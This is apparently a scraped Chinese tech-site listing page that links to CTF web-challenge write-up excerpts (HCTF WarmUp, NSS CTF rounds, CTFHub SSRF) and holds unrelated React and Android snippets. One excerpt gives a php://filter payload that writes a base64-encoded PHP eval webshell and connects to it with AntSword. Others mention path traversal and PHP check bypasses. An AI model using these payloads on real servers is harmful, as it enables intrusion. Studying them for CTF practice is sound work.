E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
CTF入门知识
polar
CTF
写shell
一、题目二、解题payload?filename=php://filter/convert.base64-decode/resource=shell.php#content=aPD89QGV2YWwoJF9QT1NUWzFdKTs/Pg==然后访问/shell.php发现木马被读入,用蚁剑连接
samRsa
·
2024-01-17 23:42
CTF
web安全
[SWPU
CTF
2022 新生赛]1z_unserialize
[SWPU
CTF
2022新生赛]1z_unserializewp题目代码:lt;$a($this->lly);}}unserialize($_POST['nss']);highlight_file(__
妙尽璇机
·
2024-01-17 23:06
ctf
web安全
网络安全
[HN
CTF
2022 Week1]What is Web
flag在源码里<!是HTML文档的注释格式,在源码里按Ctrl+F搜索<!能帮你更快地找到提示。将这个字符串base64解码得到flag:
妙尽璇机
·
2024-01-17 23:06
ctf
web安全
网络安全
[NSS
CTF
Round#16 Basic]了解过PHP特性吗
了解过PHP特性吗wp第一页题目代码:114514&&strlen($_114)9999999){$checker_3=TRUE;}}$arr4y=$_POST['arr4y'];if(is_array($arr4y)){for($i=0;$i114514&&strlen($_114)9999999){$checker_3=TRUE;}}114用科学记数法传入即可,514可以用数字+字母,数字+%
妙尽璇机
·
2024-01-17 23:06
ctf
php
web安全
网络安全
[NSS
CTF
Round #8]——web专项赛wp
MyDoor上来什么也没有,用php伪协议读取index.php中的内容,构造payload:http://node2.anna.nss
ctf
.cn:28803/index.php?
Leafzzz__
·
2024-01-17 23:05
CTF比赛复现
web安全
javascript
node.js
[NSS
CTF
Round#16 Basic]RCE但是没有完全RCE
RCE但是没有完全RCEwp题目代码:第一关
妙尽璇机
·
2024-01-17 23:35
ctf
web安全
网络安全
Android马甲包开发
build.gradle中一些相关配置2.AndroidManifest.xml中的一些相关配置(${}的使用)3.不同马甲包存放路径4.签名文件路径配置1.build.gradle中一些相关配置produ
ctF
lavor
好运常伴amin
·
2024-01-17 23:35
React全局状态管理
index.jsimportRea
ctf
rom'react'importReactDOMfrom'react-dom'impo
卡卡舅舅
·
2024-01-17 21:33
前端-React
react.js
javascript
前端
[buu - web]H
CTF
2018 WarmUp
H
CTF
2018WarmUp"source.php","hint"=>"hint.php"];if(!isset($page)||!
菜菜zhao
·
2024-01-17 20:00
CTF-web
php
[H
CTF
2018] WarmUp
[H
CTF
2018]WarmUp开局一张图,先看看页面源码信息给出了一个source.php应该是后端的源码,这题代码审计了"source.php","hint"=>"hint.php"];#这是定义了一个白名单
iKnsec
·
2024-01-17 20:28
#
buu练习记录
php
开发语言
web安全
[H
CTF
2018]WarmUp1解题思路
1.看题如下,得到一张滑稽表情2.老方法F12先看网页源码,得到注释提示3.访问hint.php,得到一串提示信息flagnothere,andflaginffffllllaaaagggg现在构造获取flag的语句hint.php?../…/…/…/…/ffffllllaaaagggg我们可以想象他传入checkFile函数要经历第一次白名单验证一次?过滤后他就是hint.php再进行一次白名单验
旺仔Sec
·
2024-01-17 20:28
CTF夺旗攻击
php
网络安全
web安全
BUU
CTF
[H
CTF
2018]WarmUp
打开环境是一个滑稽查看源代码,提示source.php打开source.php是php代码"source.php","hint"=>"hint.php"];if(!isset($page)||!is_string($page)){echo"youcan'tseeit";returnfalse;}#检查变量page里是否有source.php或者hint.phpif(in_array($page,$
白塔河冲浪手
·
2024-01-17 19:57
第一周刷题记录3.7-3.13
php
开发语言
安全
【BUU
CTF
】 H
CTF
2018 WarmUp
这是一道有关php代码审计的入门题目,进入所给链接后看到的是一张滑稽的表情包按照常规思路f12,看一看有什么,结果发现了一个名为source.php的注释访问这个php页面,发现有一段代码代码先定义了一个checkFile函数,然后主函数在下大致意思是,只有链接中包含了file文件请求且通过了checkFile函数的验证,那么将把链接包含的file文件include到页面中,否则输出一张图片(推测
90wunch
·
2024-01-17 19:57
php
安全
[H
CTF
2018]WarmUp1
建议复制到自己vscode里观看本来今天想在宿舍躺捏,后来想想还是来gxg把这篇writeup补完吧--------------------------------------------------这是buu
ctf
我小皮超勇的
·
2024-01-17 19:27
php
web安全
一、[H
CTF
2018]WarmUp
1.第一步看源码2.看source.php观察源码逻辑,首先可以发现白名单是只有source.php和hint.php,通过访问hint.php我们可以知道flag在ffffllllaaaagggg文件中但很明显我们无法直接访问,所以当然是继续分析逻辑3.审计source.php文件if(!empty(REQUEST[′file′])//_REQUEST['file'])//REQUEST[′fi
囍语儿
·
2024-01-17 19:57
web
[H
CTF
2018]WarmUp
1.访问页面,搞笑的喔。2.查看源码,有注释,那么就访问看看吧。3.访问路径http://54f45a07-0d65-4fc4-8368-9aae675b5e23.node5.buuoj.cn:81/source.php,发现源码。"source.php","hint"=>"hint.php"];if(!isset($page)||!is_string($page)){/*为了返回true两个条件
有搞头-CC
·
2024-01-17 19:26
BUUCTF
web安全
安全
H
CTF
2018 Warm up writeup
H
CTF
2018Warmupwriteup拿到题目之后发现这是一张滑稽的脸。查看源代码之后发现有注释的source.php。遂访问。得到源代码。接下来就是复杂的代码审计工作。
JSMa4ter
·
2024-01-17 19:26
web
H
CTF
2018 WarmUp Wp
首先打开页面是一个滑稽的表情,直接F12看到source.php的提示ok看source.php直接分析代码第一眼就看到有hint.php文件,直接打开看flagnothere,andflaginffffllllaaaagggg在主体代码中最重要的是通过GET传入file参数,判断emmm::类中checkFile是否为true那只看emmm这个类classemmm{publicstaticfun
Luminous_song
·
2024-01-17 19:26
BUU
CTF
-[护网杯 2018]easy_tornado 记录
[护网杯2018]easy_tornado首先打开界面,看到三个链接,分别点一下根据三个链接提示,flag在/fllllllllllllag文件中,render是python中的一个渲染函数,渲染变量到模板中,即可以通过传递不同的参数形成不同的页面。根据url需要个filehash,这个应该就是生成的filehash的方式,filename已经有了,就剩下cookie_secret.测试后发现还有
低调求发展
·
2024-01-17 17:36
读书侠《培养孩子从画画开始1》读书笔记
家长们需要知道的
入门知识
1,孩子的画和成人的画是有区别的。成人画画是因为有人要欣赏,自己有兴趣才画,而孩子是在表达自己的感情。成人会考虑周围的人怎么看,而孩子只是尽情地表达自己。
小林is天赋魔法师
·
2024-01-17 14:42
Python
入门知识
点分享——(十五)自定义函数
函数是一段事先组织好可重复使用的代码块,用于执行特定的任务。函数可以接受输入参数,并返回一个结果,从而提高应用的模块性和代码的重复利用率。先前我们已经介绍了Python中的内置函数,现在我们要学习创建自定义函数,在定义函数时需要用到关键字def。具体的语法规则如下:函数命名以def为起始,后接函数名称和参数参数必须放在小括号()内才能被函数体读取使用在函数命名行(第一行)的末尾要加上冒号冒号后的函
尘光未歇
·
2024-01-17 13:43
Python入门
python
开发语言
经验分享
pycharm
改行学it
CTF
CRYPTO 密码学-1
题目名称:enc题目描述:压缩包中含两个文件:一个秘钥d.dec,一个密文flag.enc解题过程:Step1:这题是一个解密他题目,尝试openssl去ras解密工具简介在KaliLinux系统中,openssl是一个强大的命令行工具,用于处理SSL/TLS协议。opensslpkeyutl是openssl工具集中的一个命令,用于处理私钥文件。参数解释opensslpkeyutl:这是执行私钥操
Brucye
·
2024-01-17 13:42
密码学
密码学
网络安全
CTF
CRYPTO 密码学-2
ZZZZXXXZZZZXZZZXZZXZZXXXXXZXXXXZZXZXZZZZXZXXZXZZ分析此字段是由Z和X组成的字符,联想到莫斯密码是由.和-组成的所以接下来可以尝试莫斯密码解题解题过程:Step1:Z替换为.X替换为-Step2:使用
CTF
Brucye
·
2024-01-17 13:42
密码学
密码学
CTF
CRYPTO 密码学-4
题目名称:奇怪的先生题目描述:描述:oss先生将三个培根的中间一只移到了左边,然后咬了一小口最后一根,说真好吃,真是个奇怪的先生!密文:VlM5WnlXc0ZibEhmMmE1ZHYxMDlhVkdmMlk5WmtRPT0=分析应该是根据题目提示解出压缩包的密码,查看flag。解题过程:Step1:先进行Base64解密第一次:第二次:分析发现第二次解密失败,查看题目描述。三只培根,根据密码特征联
Brucye
·
2024-01-17 13:42
密码学
密码学
Python
入门知识
点分享——(十六)标准库的导入和调用
在正式学习面向对象编程之前,我们先讲一下怎么在代码中导入并调用现成的模组,也就是Python中的标准库。像我们之前介绍过的os模块就是其中之一,下面我将为大家分别介绍几个常用的标准库。mathmath模块提供了许多对浮点数的数学运算函数,该模块下的函数返回值均为浮点数。我们使用import关键字来导入模组,再通过dir方法来获取math模组下的内容。importmathprint(dir(math
尘光未歇
·
2024-01-17 13:39
Python入门
python
开发语言
pycharm
模块测试
概率论
CTF
CRYPTO 密码学-3
题目名称:反编译题目描述:分析题目给出一个pyc后缀的文件,需要使用uncompyle6模块去还原成py文件uncompyle6简介uncompyle6是一个Python反编译器,它能够将Python字节码(.pyc文件)转换回源代码(.py文件)。解题过程:Step1:下载uncompyle6包pipinstalluncompyle6注意版本问题uncompyle6默认只支持3.8及以下版本如何
Brucye
·
2024-01-17 13:09
密码学
密码学
python
已实现:JS如何根据视频的http(s)地址,来截取帧图片,并实现大图压缩的功能
接下来是js关键方法部分:asyncextra
ctF
rame(){this.shootLoading=trueconstvideo=this.$
刚作愁时又忆卿
·
2024-01-17 09:14
javascript
音视频
vue.js
HTML5自定义右键菜单
===自定义右键菜单======================*/$("#log_list").on("contextmenu","p[class='log']",function(ev){sele
ctF
ileName
陈皮太
·
2024-01-17 07:47
JavaScript
【Web】
CTF
SHOW 文件上传刷题记录(全)
期末考完终于可以好好学
ctf
了,先把这些该回顾的回顾完,直接rushjava!
Z3r4y
·
2024-01-17 07:13
ctfshow
web
ctf
文件上传
漏洞
网络安全
wp
一个无名小辈的
CTF
成长之路-buu
ctf
:[Roar
CTF
2019]黄金6年1
打卡第一天的
ctf
脚本学习编写,一个想学
ctf
的菜鸡的成长之路,求带(第一次发文,大佬们指点一下,勿喷)题目链接:https://buuoj.cn/challenges#Roar
CTF
2019]%E9%
xi-chen
·
2024-01-17 05:05
安全
CTF
HUB--SSRF详解
SSRF详解SSRF漏洞介绍一、(内网访问、伪协议利用)1.1内网访问1.2伪协议读取文件1.3端口扫描二、(POST上传文件FastCGI协议Redis协议)2.1POST请求2.2上传文件2.3FastCGI协议2.4Redis协议三、(Bypass系列)3.1URLBypass3.2数字IPBypass3.3302跳转Bypass3.4DNS重绑定BypassSSRF漏洞介绍 SSRT(S
小蓝同学`
·
2024-01-17 04:51
信息安全漏洞
web
kali
linux
安全漏洞
渗透测试
Hive日期函数详细讲解
语法:FROM_UNIXTIME(unix_timestamp[,format])案例:SELE
CTF
ROM_UNIXTIME(1609459200);结果为'2021-01-0100:00:00'
田晖扬
·
2024-01-17 02:26
hive内置函数讲解
hive
大数据
2.1.1.2_11 Oracle数据字典 142-43 SYS.DBMS_STATS.gather_schema_stats
GATHER_SCHEMA_STATS4.1Syntax语法4.2执行存储过程4.3Parameters参数4.4Exceptions异常4.5UsageNotes使用方式附录1ApplyinganObje
ctF
ilterLis
GroupiesM
·
2024-01-17 01:08
#
2.1.1
Oracle数据字典
oracle
CTF
伪随机数爆破
要了解伪随机数的爆破首先你的先知道什么是PHP种子,借用在rand()函数中,我们可以通过设置随机数种子来影响随机数的生成。例如,在rand()函数中加入了随机数种子编码后,每次运行程序将会生成同样的随机整数序列。这个就是伪随机数,因为种子是已知的。这里使用X1NOoo大神的举例:mt_scrand()mt_rand()mt_scrand(seed)这个函数的意思就是分发seed种子,种子有了后,
补天阁
·
2024-01-16 23:05
PHP
web安全
伪随机数
Designing Virtual Connect for vSphere 5.x
DesigningVirtualConne
ctf
orvSphere5.x如何在HPC7000刀笼使用VC以满足vSphere5.x英文视频连接如下:http://professionalvmware.com
weixin_33966365
·
2024-01-16 21:11
【转载】双二阶IIR滤波器
前言双二阶滤波器说明补充说明和一些建议三种滤波器类型的计算过程系数如何使用Dire
ctF
ormI的计算过程Dire
ctF
ormII的计算过程Transposeddire
ctf
orms附录英文原文第一个链接来源的英文原文第二个链接来源的英文原文前言本文翻译自这个博客
沃卟炻
·
2024-01-16 21:38
audio
codec
算法
芯片
CTF
总结03:SQL注入
问题描述:自从在墨者学院混迹一段时间后,SQL注入的题目被我水到龙王庙...在此整理一篇答题合集,适合与我一样对与SQL知道那么一点点,但是又不怎么熟悉流程的小白~(⌐■_■)所以此处龙王镇文,保佑我SQL注入的题目顺利通过呀~步骤总结:1MySQL数字型显注答题链接:墨者学院01SQL手工注入漏洞测试(MySQL数据库)解题步骤:语句功能and1=1and1=2判断注入点orderby5判断字段
梅头脑_
·
2024-01-16 21:53
#
CTF总结
sql
mysql
web安全
Web安全攻防世界09 ics-07(X
CTF
)
问题描述友情提示:攻防世界最近的答题环境不太稳定,我这篇没有做到最后一步...为了水个成就提前发出来了,以后等网好了会测试到最后一步的...本次ics-07的解题过程依然小白友好~题目是这个样子的:是工控的云管理系统,页面看起来好酷炫~我们先点击左边的目录,看看有没有什么可疑的上传或者注入点~唯一可以利用的链接是业务管理下的项目管理,目测是sql注入~根据页面viewsource的提示,crtl+
梅头脑_
·
2024-01-16 21:51
#
攻防世界
php
web安全
Web安全攻防世界02 fileclude(
ctf
)
问题描述攻防世界文件包含入门题目,依旧参考大佬的WP有所补充,内容对小白友好~原因分析:网页中直接存在源码,在此翻译和分析~WRONGWAY!
梅头脑_
·
2024-01-16 21:21
#
攻防世界
web安全
php
安全
谁能告诉我出现声明故障问题的解决方案
clientcore\windows\advcore\
ctf
\uim\tim.cpp(800)\MS
CTF
.dll!
小唐C++
·
2024-01-16 19:00
声明
文件提取
设计
stm32
c++
其他
开源
树形结构下拉框组件vue-treeselect的使用(安装、模糊匹配、单选、多选、延迟加载、异步搜索等)
一、基本使用流程首先npm安装依赖npminstall@riophae/vue-treeselect--save然后在需要使用的组件中引入importTreesele
ctf
rom'@riophae/vue-treeselect'import
小白_ysf
·
2024-01-16 18:39
前端基础
Vue2+Vue3
vue.js
前端
javascript
[GXY
CTF
2019]Ping Ping Ping
1.访问页面,提示传参为ip。2.?ip=明显存在命令执行注入,使用;或者|闭合上一条命令。经过fuzz测试,过滤了空格、bash字符、flag字符、以及一些特殊符号。?ip=;ls时,发现flag.php就在当前目录下。3.构造POC,获取Flag。方案一:;a=g;cat$IFS$1fla$a.php方案二:;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|
有搞头-CC
·
2024-01-16 18:36
BUUCTF
web安全
安全
安全性测试
前端
[A
CTF
2020 新生赛]Exec
1.访问页面,为命令执行。2.发现可以执行命令。3.直接查看flag。127.0.0.1&&cat/flagflag{cf369253-09f4-4ff8-a1fb-97922cf87b06}
有搞头-CC
·
2024-01-16 18:06
BUUCTF
web安全
安全性测试
安全
[GDOU
CTF
2023]pixelart
考点:像素处理下载题目得到如下一张图片使用010打开,发现末尾有像素提示右键查看图片属性图中放了一个缩略图,PS量一下,每个像素宽高都距离12px发现原始分辨率是3840*2160------>320*180正好是缩小12倍使用脚本改变图片像素#改变图片像素fromPILimportImageimg=Image.open('arcaea.png')w=img.widthh=img.height#新
Echo-J
·
2024-01-16 18:28
misc
前端
算法
[Lit
CTF
2023]easy_shark
解压缩,发现需要输入密码,使用010打开,发现frflags和deflags都被修改了,这就会造成压缩包伪加密把他们都改为0,再打开将流量包使用wirshark打开过滤http,并追踪得到以下信息看到了一个类似于flag格式的字符串,但是经过了加密,上方还存在一个方程,解为1777尝试仿射密码解密得到flag,flag{w13e5hake_1s_a_900d_t3a771c_t001}由于flag
Echo-J
·
2024-01-16 18:25
misc
MISC
linux用户空间资料读取到内核驱动
include#include#include#include#include#include#includestaticint__initread_pic_init(void){intret=0;stru
ctf
ile
Chhjnavy
·
2024-01-16 16:33
Linux
树莓派
linux
kernel
kernel_read
file_open
error while loading shared libraries: libncurses.so.5: cannot open shared object file
/mysql:errorwhileloadingsharedlibraries:libncurses.so.5:cannotopensharedobje
ctf
ile:Nosuchfileordirectory
天空之外136
·
2024-01-16 15:18
服务器
Web3D编程入门总结——WebGL与Three.js基础介绍
*/2/*第一部分,webgl与three.js基础介绍,要求读者掌握JavaScript
入门知识
*/3//webgl原理:通过JavaScript语言在浏览器端生成glsl代码,
我爱丁丁猫
·
2024-01-16 14:51
前端
web3d
webgl
three.js
html5
canvas
glsl
2023年第十六届山东省职业院校技能大赛“信息安全管理与评估“赛项规程
GeekSec专注技能竞赛培训4年,包含网络建设与运维和信息安全管理与评估两大赛项,及各大
CTF
培训,基于两大赛项提供全面的系统性培训,拥有完整的培训体系。
Geek极安网络安全
·
2024-01-16 13:22
信安评估各地区规程样题
web安全
安全
php
网络
网络安全
系统安全
计算机网络
typeScript +react 中使用video标签不能使用video自带的play方法和pause方法
import*asRea
ctf
rom'react';importclassnamesfrom'classnames';import'.
懵逼猫9527
·
2024-01-16 13:01
上一页
19
20
21
22
23
24
25
26
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他